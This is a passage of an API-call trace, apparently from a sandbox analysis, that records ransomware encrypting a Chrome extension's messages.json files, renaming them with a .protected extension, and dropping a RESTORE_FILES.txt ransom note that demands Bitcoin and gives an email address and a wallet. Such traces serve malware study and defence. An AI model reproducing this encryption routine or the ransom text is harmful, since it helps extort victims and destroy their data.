lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.457] CloseHandle (hObject=0x164) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.457] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0083.457] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0083.457] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0083.457] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0083.457] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0083.457] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned 150 [0083.457] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0083.457] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0083.457] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*") returned 152 [0083.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\.") returned 152 [0083.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.458] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\..") returned 153 [0083.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.458] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.459] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.459] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.459] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.459] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.459] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.474] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.475] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.475] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.475] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.475] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.475] CloseHandle (hObject=0x168) returned 1 [0083.475] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.protected") returned 174 [0083.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.protected")) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.476] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.476] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\RESTORE_FILES.txt") returned 168 [0083.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.477] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.477] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.477] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.477] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.477] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.477] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.478] CloseHandle (hObject=0x164) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.478] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned 150 [0083.478] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0083.478] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*") returned 152 [0083.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\.") returned 152 [0083.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\..") returned 153 [0083.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.479] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.479] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.479] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.479] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.480] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.480] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.480] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.480] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.483] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.483] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.484] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.484] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.484] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.484] CloseHandle (hObject=0x168) returned 1 [0083.484] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.protected") returned 174 [0083.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.protected")) returned 1 [0083.485] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.485] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.485] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\RESTORE_FILES.txt") returned 168 [0083.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.485] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.485] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.486] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.486] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.486] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.486] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 